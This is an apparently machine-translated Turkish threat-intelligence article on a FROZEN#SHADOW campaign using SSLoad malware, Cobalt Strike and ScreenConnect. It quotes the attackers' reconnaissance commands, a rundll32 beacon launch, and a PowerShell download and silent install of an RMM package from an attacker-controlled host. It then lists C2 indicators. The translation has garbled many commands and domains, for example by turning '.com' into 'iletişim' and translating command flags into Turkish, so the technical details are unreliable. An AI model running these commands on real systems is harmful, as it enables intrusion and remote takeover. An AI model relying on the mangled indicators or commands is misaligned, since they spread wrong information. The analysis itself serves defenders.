Operasyonları için SSLoad kötü amaçlı yazılımını ve tüm ağı döndürmek ve ele geçirmek için Cobalt Strike İmplantlarını kullanan FROZEN#SHADOW tarafından yeni bir saldırı kampanyasının kullanıldığı keşfedildi.
Ayrıca tehdit aktörleri daha fazla kontrol sağlamak için ScreenConnect RMM gibi Uzaktan İzleme ve yönetim yazılımlarını da kullandı.
SSLoad, sistemlere gizlice sızabilen, hassas bilgiler toplayan ve toplanan bilgileri kötü amaçlı yazılım operatörlerine geri sızdırabilen, iyi tasarlanmış bir kötü amaçlı yazılımdır.
Üstelik kötü amaçlı yazılım, tespit edilmekten kaçmak ve kalıcılığı sürdürmek için birden fazla arka kapıdan ve veri yükünden de yararlanıyor.
Teknik Analiz
Bu yeni saldırı kampanyası, kötü amaçlı bir bağlantı içeren geleneksel bir kimlik avı e-postasıyla başlıyor.
Kullanıcılar bu bağlantıyı ziyaret ettiğinde, onları şuraya yönlendirir: mmtixmm[.]kuruluş Kurban makineye bir JavaScript dosyasının indirildiği başka bir indirme sitesinin URL’si.
Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide
Bu JavaScript dosyası manuel olarak yürütülürse, kurban makineye daha fazla veri indirip çalıştıracak çeşitli işlemler gerçekleştirir.
Kurbanlar Asya, Avrupa ve Amerika dahil birden fazla ülkede olduğundan, bu kimlik avı e-posta kampanyalarının hedeflenmesi rastgele görünüyor.
Kötü amaçlı yazılıma ilişkin daha ileri araştırmalar, saldırının aşağıdaki farklı aşamalarda gerçekleştiğini ortaya çıkardı:
- Aşama 1: İlk Yürütme – JavaScript
- Aşama 2: MSI Dosyasının Yürütülmesi
- Aşama 3: Kötü Amaçlı Yazılım Yürütme
- Aşama 4: Kobalt Saldırısı Uygulaması
- Aşama 5: RMM Yazılımı ve Yanal Hareket
Aşama 1: İlk Yürütme – JavaScript
Bu ilk aşama, JavaScript dosyasının manuel olarak yürütülmesini içerir.
JS dosyası out_czlrh.js analiz edildiğinde, dosyayı karartmak için %97,6’sının rastgele karakterlerden oluşan yorumlu koddan oluştuğu keşfedildi.
Ancak yorum yapılan kodun kaldırılması, herhangi bir karmaşıklığa sahip olmayan, çok net bir JS kodunu ortaya çıkardı.
.webp)
JS kodu analiz edildiğinde, JS dosyasının, WScript.Network ve Scripting.FileSystemObject için ActiveXObject örneklerinin oluşturulmasıyla başlayan birden fazla işlemi gerçekleştirdiği gözlemlendi.
Bundan sonra “GetObject(“winmgmts:\\\\.\\root\\cimv2”)” içeren JS kodu, basit komut satırı işlemleri için WMI Nesnesine erişmeye çalışır.
.webp)
Ayrıca kod, bağlantı denemelerinin sayısını yönetmek ve bir ağ paylaşımının bağlantı durumunu toplamak için değişkenler de ayarlar.
Ayrıca komut dosyası, kullanılabilir tüm sürücüleri \\wireoneinternet adresinde bulunan bir ağ paylaşımına da eşler.[.]info@80\paylaş\.
JS kodu ayrıca ağ sürücüsünü doğru şekilde eşlemek için WMI aracılığıyla “net use” komutunu da yürütür.
Bundan sonra üç saniyelik bir bekleme olur ve ardından ağ sürücüsünün eşlemesini onaylamak için aynı komut tekrar çalıştırılır.
Tüm bu adımlar başarıyla tamamlandıktan sonra komut dosyası, eşlenen ağ sürücüsünden bir MSI paketi (slack.msi) yüklemek için aşağıdaki komutu kullanarak bir komut oluşturur: msiexec.exe.
Aşama 2: MSI Yürütülmesi
Bu slack.msi dosyası, genellikle TrickBot kötü amaçlı yazılım çetesi tarafından kullanılan BazarBackdoor’a benzer.
Kötü amaçlı yazılım ağları filtreleyebiliyor ve ek yükler dağıtabiliyordu. Ancak bu slack.msi dosyasını çalıştırdıktan sonra kötü amaçlı yazılım birden fazla alan adıyla iletişim kurar
- wireoneinternet[.]bilgi
- skinnyjeanso[.]iletişim
- Titnovakrion[.]tepe
- Maramaravilha[.]iletişim
- globalsolutionunlimitedltd[.]iletişim
Üstelik SSLoad kötü amaçlı yazılımı ancak bundan sonra indirilip çalıştırılır.
SSLoad’ın verileri, \%APPDATA%\local\digistamp\mbae-api-na.dll konumunda bulunan yarı rastgele adlandırılmış bir DLL dosyasından oluşur.
Ancak bu DLL, Rundll32.exe tarafından yürütülür ve ardından DLL kendisini %APPDATA%\Custom_update\ konumuna kopyalar.
.webp)
Aşama 3: Kötü Amaçlı Yazılım Yürütme
Önceki aşamaya ek olarak, rundll32.exe komutunun yürütülmesi, önceden yapılandırılmış iki C2 sunucusuyla da iletişime başlayacaktır. hxxps://skinnyjeanso[.]com/canlı/ ve hxxps://titnovacrion[.]üst/canlı/. Bunu takiben kötü amaçlı yazılım, aşağıdaki cmd.exe komutlarını kullanarak yerel ana bilgisayar için sistem ve kullanıcı verilerinin yanı sıra etki alanıyla ilgili bilgileri toplamaya başlar.
- exe /c ipconfig /tümü
- exe /c sistem bilgisi
- exe /c nltest /domain_trusts
- exe /c nltest /domain_trusts /all_trusts
- exe /c net görünümü /tümü /etki alanı
- exe /c net görünümü /tümü
- exe /c net grubu “etki alanı yöneticileri” /etki alanı
- exe /c wmic.exe /düğüm:localhost /namespace:\\root\securitycenter2 yol antivirüs ürünü get * /format:list
- exe /c net yapılandırma iş istasyonu
- exe /c wmic.exe /düğüm:localhost /namespace:\\root\securitycenter2 yol antivirüs ürünü görünen adı al | findstr /v /b /c:görünenad || echo antivirüs yüklü değil
- exe /c whoami /gruplar
Toplanan bu bilgiler daha sonra HTTPS bağlantıları aracılığıyla C2 sunucularına gönderilir. Tehdit aktörleri bu bilgileri virüslü sistemden aldıktan sonra, bilginin honeypot’tan değil meşru bir sunucudan geldiğini doğruladıktan sonra bazı manuel komutları uygulamaya başlarlar. Tehdit aktörleri tarafından yürütülen manuel komutlar aşağıdaki gibidir:
- exe-c “[console]::çıkış kodlaması = [console]::giriş kodlaması = [system.text.encoding]::getencoding(‘utf-8’); HKM:\; güç kalkanı”
- exe /gruplar
- exe grubu “etki alanı yöneticileri” /dom
- exe /düğüm:localhost /namespace:\\root\securitycenter2 yol antivirüs ürünü get * /format:list
Bu komutlar, kötü amaçlı yazılım etkinliklerinin bir sonraki aşaması için sunucu ortamını değiştirmek ve araştırmak amacıyla yürütüldü.
Aşama 4: Kobalt Saldırı İşareti
Kötü amaçlı yazılımın bu aşaması, manuel komutları yürüttükten sonra sistemlere Cobalt Strike işaretini yerleştirmeyi içerir.
Bu işaret konuşlandırıldığında C2 için birincil iletişim aracı haline gelir. Ancak, bu işaret aşağıdaki rundll32.exe komutu aracılığıyla bırakılır ve yürütülür.
Rundll32.exe C:\ProgramData\msedge.dll,MONSSMRpgaTQssmrpgatq
Ek olarak, tehdit aktörleri bu Cobalt Strike’ı aşağıdaki komutları kullanarak kurbanın sistemine bir ScreenConnect RMM yazılım örneğini indirip yüklemek için de kullandı:
- exe /c whoami /gruplar
- exe /c wmic /node:localhost /namespace:\\root\securitycenter2 yol antivirüs ürünü get * /format:list
- exe /c iwr -uri “hxxps://t0talwar.screenconnect[.]com/bin/screenconnect.clientsetup.msi?e=access&y=guest&c=&c=tjx-usa.com&c=&c=dc&c=&c=&c=&c=” -outfile c:\programdata\msedgeview.msi
- exe /c sistem bilgisi
- exe /c msiexec.exe /i C:\ProgramData\Msedgeview.msi /quiet /qn
Aşama 5: RMM Yazılımı ve Yanal Hareket
Güvenliği ihlal edilen her bir sistem, sistem üzerinde tam kontrol sağlamak amacıyla ScreenConnect RMM Yazılımı ile kontrol edilir.
Ancak bundan sonra kimlik bilgileri ve diğer kritik sistem detayları toplanarak Lateral hareket gerçekleşir.
Ortamın numaralandırılması, Invoke-ShareFinder, Find-DomainShare ve Get-DomainFileServer PowerShell komutları gibi birden çok PowerShell komutu kullanılarak yapılır.
Kimlik bilgisi çıkarma işlemi, aynı zamanda bir etki alanı yönetici hesabı NTLM karmasını da elde edebilecekleri şekilde gerçekleştirilir.
Uzlaşma Göstergeleri
C2 Adresi
- 85.239.54[.]190
- 23.159.160[.]88
- 23.95.209[.]148
- 45.95.11[.]134
- bjSdg0.pintaexoticfashion.co[.]içinde
- l1-03.winupdate.us[.]ile
- 23-95-209-148-host.colocrossing[.]com:443
- mmtixmm[.]kuruluş
- wireoneinternet[.]bilgi
- skinnyjeanso[.]iletişim
- Titnovakrion[.]tepe
- Basitçe fitphilly[.]iletişim
- Kasnackamarch[.]bilgi
- Sokingscrosshotel[.]iletişim
- Danteshpk[.]iletişim
- tabakalaşma[.]iletişim
- winarkamaps[.]iletişim
- globalsolutionunlimitedltd[.]iletişim
- hafif vilha[.]iletişim
- krd6[.]iletişim
- hxxps://t0talwar.screenconnect[.]iletişim
Ayrıca, bu saldırı kampanyası için kullanılan dosyaların/karmaların tam listesini burada bulabilirsiniz.
Combat Email Threats with Easy-to-Launch Phishing Simulations: Email Security Awareness Training -> Try Free Demo